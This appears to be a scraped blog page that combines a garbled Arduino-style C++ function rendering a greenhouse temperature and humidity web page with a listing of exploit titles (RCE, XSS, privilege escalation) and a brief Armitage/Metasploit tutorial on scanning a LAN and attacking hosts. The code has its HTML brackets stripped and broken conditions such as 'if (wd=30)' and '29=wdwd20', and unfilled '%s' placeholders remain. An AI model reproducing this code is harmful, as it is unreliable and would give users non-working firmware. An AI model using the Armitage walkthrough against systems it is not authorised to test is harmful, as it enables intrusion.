String SendHTML(float Temperaturestat,float Humiditystat){
String ptr='!DOCTYPE html html\n';
ptr +='head meta name=\'viewport\' content=\'width=device-width, initial-scale=1.0, user-scalable=no\'\n';
ptr +='link href=\'https://fonts.googleapis.com/css?family=Open+Sans:300,400,600\' rel=\'stylesheet\'\n';
ptr +='meta charset=\'UTF-8\'\n';
ptr +='titlePriess's nest—smart thermometer/title\n';
ptr +='stylehtml { font-family: 'Open Sans', sans-serif; display: block; margin: 0px auto; text-align: center;color: #333333;}\n';
ptr +='body{margin-top: 50px;}\n';
ptr +='h1 {margin: 50px auto 30px;}\n';
ptr +=' .wd {margin: 50px auto 30px;width: auto;color: #f39c12}\n';
ptr +=' .wd1 {margin: 50px auto 30px;width: auto;color: #3498db}\n';
ptr +='.side-by-side{display: inline-block;vertical-align: middle;position: relative;}\n';
ptr +='.humidity-icon{background-color: #3498db;width: 30px;height: 30px;border-radius: 50%;line-height: 36px;}\n';
ptr +='.humidity-text{font-weight: 600;padding-left: 15px;font-size: 19px;width: 160px;text-align: left;}\n';
ptr +='.humidity{font-weight: 300;font-size: 60px;color: #3498db;}\n';
ptr +='.temperature-icon{background-color: #f39c12;width: 30px;height: 30px;border-radius: 50%;line-height: 40px;}\n';
ptr +='.temperature-text{font-weight: 600;padding-left: 15px;font-size: 19px;width: 160px;text-align: left;}\n';
ptr +='.temperature{font-weight: 300;font-size: 60px;color: #f39c12;}\n';
ptr +='.superscript{font-size: 17px;font-weight: 600;position: absolute;right: -20px;top: 15px;}\n';
ptr +='.data{padding: 10px;}\n';
ptr +='/style\n';
ptr +='/head\n';
ptr +='body\n';
ptr +='div id=\'webpage\'\n';
ptr +='h1 indoor greenhouse detection system/h1\n';
ptr +='div class=\'data\'\n';
ptr +='div class=\'side-by-side temperature-icon\'\n';
ptr +='svg version=\'1.1\' id=\'Layer_1\' xmlns=\'http://www.w3.org/2000/svg\' xmlns:xlink=\'http://www.w3.org/1999/xlink\' x=\'0px\' y=\'0px\'\n';
ptr +='width=\'9.915px\' height=\'22px\' viewBox=\'0 0 9.915 22\' enable-background=\'new 0 0 9.915 22\' xml:space=\'preserve\'\n';
ptr +='path fill=\'#FFFFFF\' d=\'M3.498,0.53c0.377-0.331,0.877-0.501,1.374-0.527C5.697-0.04,6.522,0.421,6.924,1.142\n';
ptr +='c0.237,0.399,0.315,0.871,0.311,1.33C7.229,5.856,7.245,9.24,7.227,12.625c1.019,0.539,1.855,1.424,2.301,2.491\n';
ptr +='c0.491,1.163,0.518,2.514,0.062,3.693c-0.414,1.102-1.24,2.038-2.276,2.594c-1.056,0.583-2.331,0.743-3.501,0.463\n';
ptr +='c-1.417-0.323-2.659-1.314-3.3-2.617C0.014,18.26-0.115,17.104,0.1,16.022c0.296-1.443,1.274-2.717,2.58-3.394\n';
ptr +='c0.013-3.44,0-6.881,0.007-10.322C2.674,1.634,2.974,0.955,3.498,0.53z\'/\n';
ptr +='/svg\n';
ptr +='/div\n';
ptr +='div class=\'side-by-side temperature-text\'Indoor temperature: /div\n';
ptr +='div class=\'side-by-side temperature\'';
ptr +=(int)Temperaturestat;
ptr +='span class=\'superscript\'°C/span/div\n';
ptr +='/div\n';
ptr +='div class=\'data\'\n';
ptr +='div class=\'side-by-side humidity-icon\'\n';
ptr +='svg version=\'1.1\' id=\'Layer_2\' xmlns=\'http://www.w3.org/2000/svg\' xmlns:xlink=\'http://www.w3.org/1999/xlink\' x=\'0px\' y=\'0px\'\n\'; width=\'12px\' height=\'17.955px\' viewBox=\'0 0 13 17.955\' enable-background=\'new 0 0 13 17.955\' xml:space=\'preserve\'\n';
ptr +='path fill=\'#FFFFFF\' d=\'M1.819,6.217C3.139,4.064,6.5,0,6.5,0s3.363,4.064,4.681,6.217c1.793,2.926,2.133,5.05,1.571,7.057\n';
ptr +='c-0.438,1.574-2.264,4.681-6.252,4.681c-3.988,0-5.813-3.107-6.252-4.681C-0.313,11.267,0.026,9.143,1.819,6.217\'/path\n';
ptr +='/svg\n';
ptr +='/div\n';
ptr +='div class=\'side-by-side humidity-text\'Indoor humidity: /div\n';
ptr +='div class=\'side-by-side humidity\'';
ptr +=(int)Humiditystat;
ptr +='span class=\'superscript\'%/span/div\n';
ptr +='/div\n';
//Define the temperature variable and assign the value to use for logical judgment.
int wd=Temperaturestat ;
if (wd=30){
ptr +='div class=\'wd\'Hi~ Baby, the weather is so hot today, so inject heat prevention! /div\n';
}
if (29=wdwd20){
ptr +='div class=\'wd1\'Hi~ Baby, the weather is nice today, so let's have fun! /div\n';
}
if (wd10){
ptr +='div class=\'side-by-side humidity-text\'Hi~ The weather is cold today, so wear more clothes and be careful to catch a cold! /div\n';
}
ptr +='/div\n';
ptr +='/body\n';
ptr +='/html\n';
return ptr;
}I added a warm reminder based on the source code! When the temperature is in different ranges, different greetings are prompted.
//Define the temperature variable and assign the value to use for logical judgment.
int wd=Temperaturestat ;
if (wd=30){
ptr +='div class=\'wd\'Hi~ Baby, the weather is so hot today, so inject heat prevention! /div\n';
}
if (29=wdwd10){
ptr +='div class=\'wd1\'Hi~ Baby, the weather is nice today, so let's have fun! /div\n';
}
if (wd=10){
ptr +='div class=\'side-by-side humidity-text\'Hi~ The weather is cold today, so wear more clothes and be careful to catch a cold! /div\n';
}
- Read more...
- 0 comments
- 2 views
- Read more...
- 0 comments
- 1 view
Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 2 views
ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path
HACKER · %s · %s
- Read more...
- 0 comments
- 2 views
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view
Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 2 views
Serendipity 2.4.0 - Cross-Site Scripting (XSS)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
Title: Penetration testing with Armitage
HACKER · %s · %s
Armitage is a Java-based Metasploit graphical interface attack software. It can be used to combine exploits known in Metasploit to automate attacks against vulnerabilities existing in the host. Using Metasploit through the command line is more difficult and there are too many commands that need to be memorized. Armitage perfectly solves this problem. Users only need to simply click on the menu to achieve security testing and attacks on the target host. Armitage's good graphic display interface makes the attack process more intuitive and the user experience better. Due to its simplicity of operation, it is especially suitable for beginners of Metasploit to conduct security testing and attacks on target systems.
Start
After startup, it is shown in the figure! If the prompt is error, please enable postgresql in advance
Scan the target
For the scanning of the target, we can use Nmap or Msf to scan!
As shown in the figure, we scanned some devices in the LAN
There are windows devices, printers, and linux devices
At this time, we can scan a device.
You can see the port that is currently enabled by the device.
Start the attack
Right-click to select Scan, Armitage will call Metasploit's vulnerability scanning module, scan the target machine in a direction, find existing vulnerabilities, and provide a reference for the next step of determining the attack method:
After success, we will find that the device icon will change
Of course, we can also use various exps given by the system to attack!
- Read more...
- 0 comments
- 2 views
X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view